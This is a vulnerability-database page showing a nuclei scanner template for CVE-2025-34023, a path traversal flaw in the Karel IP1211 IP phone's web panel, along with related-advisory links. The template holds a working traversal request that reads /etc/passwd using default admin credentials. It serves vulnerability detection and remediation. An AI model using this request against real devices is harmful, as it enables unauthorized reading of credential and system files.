Lucene search
K

Karel IP Phone IP1211 Web Management Panel - Local File Inclusion

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Karel IP Phone IP1211 Web Management Panel allows local file inclusion via cgiServer.exx page parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-34023
20 Jun 202522:14
circl
CNNVD
Karel IP1211 IP Phone 安全漏洞
20 Jun 202500:00
cnnvd
CVE
CVE-2025-34023
20 Jun 202518:37
cve
Cvelist
CVE-2025-34023 Karel IP Phone IP1211 Path Traversal
20 Jun 202518:37
cvelist
EUVD
EUVD-2025-18777
3 Oct 202520:07
euvd
NVD
CVE-2025-34023
20 Jun 202519:15
nvd
Positive Technologies
PT-2025-26459 · Karel · Karel Ip1211 Ip Phone
20 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-34023
23 Jun 202508:39
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-34023
20 Jun 202500:00
vulncheck_kev
Vulnrichment
CVE-2025-34023 Karel IP Phone IP1211 Path Traversal
20 Jun 202518:37
vulnrichment
Rows per page
id: CVE-2025-34023

info:
  name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
  impact: |
    Attackers can read arbitrary files including sensitive configuration and credential files stored on the device through path traversal in the page parameter.
  remediation: |
    Update Karel IP Phone IP1211 firmware to the latest version that properly validates file paths, or restrict access to the cgiServer.exx endpoint.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100038
    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34023
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-34023
    epss-score: 0.01409
    epss-percentile: 0.69384
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: cve,cve2025,karel,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"

    headers:
      Authorization: Basic YWRtaW46YWRtaW4=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fae0dfff23073d2880f973d0daf748295060bc0288425ac245ec2fe8fae7351c02207693f5700d0b00e16d496c041a7a04a9f2332e6235745387402c0fdebec25ff5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 48.5
EPSS0.01409
SSVC
7